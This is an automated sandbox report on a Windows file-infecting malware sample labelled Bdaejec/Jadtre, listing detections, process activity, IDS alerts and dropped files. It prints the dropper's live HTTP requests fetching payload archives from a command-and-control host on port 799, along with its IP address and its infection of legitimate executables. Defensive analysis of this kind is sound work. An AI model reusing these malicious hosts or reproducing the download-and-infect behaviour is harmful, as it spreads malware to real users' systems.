Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
biKy3nZEyJ.exe

Overview

General Information

Sample name:biKy3nZEyJ.exe
renamed because original name is a hash value
Original sample name:98DC44E47B06318EBD73414912CD60F5FF71B3FE172476D353B4DDA39C7DC327.exe
Analysis ID:1480645
MD5:6963bb0311ded02ba57657ba4a61d427
SHA1:777ed3376f2b380fef0658e6b1ab4a90e4dca901
SHA256:98dc44e47b06318ebd73414912cd60f5ff71b3fe172476d353b4dda39c7dc327
Tags:exe
Infos:

Detection

Bdaejec
Score:81
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Yara detected Bdaejec
AI detected suspicious sample
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • biKy3nZEyJ.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\biKy3nZEyJ.exe" MD5: 6963BB0311DED02BA57657BA4A61D427)
    • TJytnf.exe (PID: 7356 cmdline: C:\Users\user\AppData\Local\Temp\TJytnf.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 7528 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7356 -s 1580 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: TJytnf.exe PID: 7356JoeSecurity_BdaejecYara detected BdaejecJoe Security
    No Sigma rule has matched
    No Snort rule has matched
    Timestamp:2024-07-24T22:22:34.069820+0200
    SID:2838522
    Source Port:62273
    Destination Port:53
    Protocol:UDP
    Classtype:Malware Command and Control Activity Detected
    Timestamp:2024-07-24T22:22:34.622058+0200
    SID:2807908
    Source Port:49730
    Destination Port:799
    Protocol:TCP
    Classtype:Malware Command and Control Activity Detected
    Timestamp:2024-07-24T22:22:39.755674+0200
    SID:2807908
    Source Port:49731
    Destination Port:799
    Protocol:TCP
    Classtype:Malware Command and Control Activity Detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: biKy3nZEyJ.exeAvira: detected
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManageruAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarbAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net/EAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarAAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k1.rar:Avira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k2.rar4uAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarwAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarVAvira URL Cloud: Label: phishing
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
    Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
    Source: biKy3nZEyJ.exeJoe Sandbox ML: detected
    Source: biKy3nZEyJ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdb source: biKy3nZEyJ.exe
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
    Source: Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdbe source: biKy3nZEyJ.exe

    Spreading

    barindex
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 1_2_00C029E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_00C029E2
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 1_2_00C02B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00C02B8C
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

    Networking

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 799
    Source: global trafficTCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799
    Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 1_2_00C01099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,1_2_00C01099
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
    Source: TJytnf.exe, 00000001.00000003.1795628284.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
    Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/E
    Source: TJytnf.exe, 00000001.00000003.1804648171.0000000000B12000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000002.1981067567.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
    Source: TJytnf.exe, 00000001.00000003.1804648171.0000000000B12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar:
    Source: TJytnf.exe, 00000001.00000003.1804648171.0000000000B12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarV
    Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
    Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar4u
    Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarA
    Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManageru
    Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarb
    Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarw
    Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
    Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.comHolger
    Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.comBrendon
    Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.comDeepak
    Source: SciTE.exe.1.drString found in binary or memory: http://www.lua.org
    Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.comJosiah
    Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org
    Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org/scite.rng
    Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.comMathias
    Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B05000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000003.1804648171.0000000000B12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
    Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/
    Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/Morten
    Source: SciTE.exe.1.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_2f12400c-c

    System Summary

    barindex
    Source: biKy3nZEyJ.exeStatic PE information: section name: A#uq
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
    Source: TJytnf.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_004528100_2_00452810
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_0044DC200_2_0044DC20
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_004420300_2_00442030
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_004429700_2_00442970
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00451E500_2_00451E50
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_0044DAC00_2_0044DAC0
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_004522C00_2_004522C0
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_004492E00_2_004492E0
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_004413600_2_00441360
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_0040431D0_2_0040431D
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 1_2_00C060761_2_00C06076
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 1_2_00C06D001_2_00C06D00
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\TJytnf.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7356 -s 1580
    Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
    Source: biKy3nZEyJ.exe, 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNHASPX.exeF vs biKy3nZEyJ.exe
    Source: biKy3nZEyJ.exeBinary or memory string: OriginalFilenameNHASPX.exeF vs biKy3nZEyJ.exe
    Source: biKy3nZEyJ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: TJytnf.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: TJytnf.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: TJytnf.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
    Source: classification engineClassification label: mal81.spre.troj.evad.winEXE@5/11@1/1
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 1_2_00C0119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_00C0119F
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rarJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7356
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeFile created: C:\Users\user\AppData\Local\Temp\TJytnf.exeJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\biKy3nZEyJ.exe "C:\Users\user\Desktop\biKy3nZEyJ.exe"
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeProcess created: C:\Users\user\AppData\Local\Temp\TJytnf.exe C:\Users\user\AppData\Local\Temp\TJytnf.exe
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7356 -s 1580
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeProcess created: C:\Users\user\AppData\Local\Temp\TJytnf.exe C:\Users\user\AppData\Local\Temp\TJytnf.exeJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: oledlg.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeAutomated click: OK
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: biKy3nZEyJ.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: biKy3nZEyJ.exeStatic file information: File size 3101704 > 1048576
    Source: biKy3nZEyJ.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x259600
    Source: biKy3nZEyJ.exeStatic PE information: More than 200 imports for USER32.dll
    Source: biKy3nZEyJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdb source: biKy3nZEyJ.exe
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
    Source: Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdbe source: biKy3nZEyJ.exe

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeUnpacked PE file: 1.2.TJytnf.exe.c00000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: A#uq
    Source: biKy3nZEyJ.exeStatic PE information: section name: CONST
    Source: biKy3nZEyJ.exeStatic PE information: section name: A#uq
    Source: TJytnf.exe.0.drStatic PE information: section name: .aspack
    Source: TJytnf.exe.0.drStatic PE information: section name: .adata
    Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
    Source: MyProg.exe.1.drStatic PE information: section name: PELIB
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
    Source: SciTE.exe.1.drStatic PE information: section name: u
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00401840 push 00411729h; ret 0_2_00401845
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00405846 push ecx; retn 006Dh0_2_00405847
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00403454 push 00406339h; ret 0_2_00403468
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00402455 push FFFFFF86h; ret 0_2_00402457
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00404C6D push 0040598Ch; ret 0_2_00404CAC
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_0040187A push 0041A712h; ret 0_2_00401887
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00407C04 push 00424CBFh; ret 0_2_00407C0C
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_0040740B push 00436788h; ret 0_2_00407417
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00403818 push 00407F45h; ret 0_2_00403844
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00406418 push 00409DE9h; ret 0_2_00406428
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00401C1D push 00430E02h; ret 0_2_00401C56
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00401C1F push 00430E02h; ret 0_2_00401C56
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00402C2E push 0041D9C4h; ret 0_2_00402C4D
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00439439 push 0041340Eh; ret 0_2_0043D062
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_0040C8CA push 00407821h; ret 0_2_0040C8CF
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_004074EE push 0042BE47h; ret 0_2_004074F4
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_004048F8 push 00404966h; ret 0_2_00404908
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_004158FE push 00420E3Ch; ret 0_2_00415907
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00405098 push ecx; ret 0_2_0040509B
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_004018B1 push 0040CC1Bh; ret 0_2_004018BD
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_004054B4 push 004294D3h; ret 0_2_004054CD
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_0040CD41 push 00409805h; ret 0_2_0040CD5E
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00402142 push 0043780Dh; ret 0_2_00402BD0
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00407542 push 0042086Ch; ret 0_2_00407564
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00405145 push 00413471h; ret 0_2_00405159
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00402548 push 0042B124h; ret 0_2_0040254E
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00403156 push 0042FB70h; ret 0_2_00403163
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00402163 push 0040E9AFh; ret 0_2_0042FDA6
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_0041A96D push 0041AC46h; ret 0_2_0041A976
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_0041357E push 0042DAAFh; ret 0_2_004135B1
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_0040217F push 0040D680h; ret 0_2_00402184
    Source: biKy3nZEyJ.exeStatic PE information: section name: A#uq entropy: 6.934503720718857
    Source: TJytnf.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
    Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.93457078895935
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.934657632422996
    Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.934761876222671

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
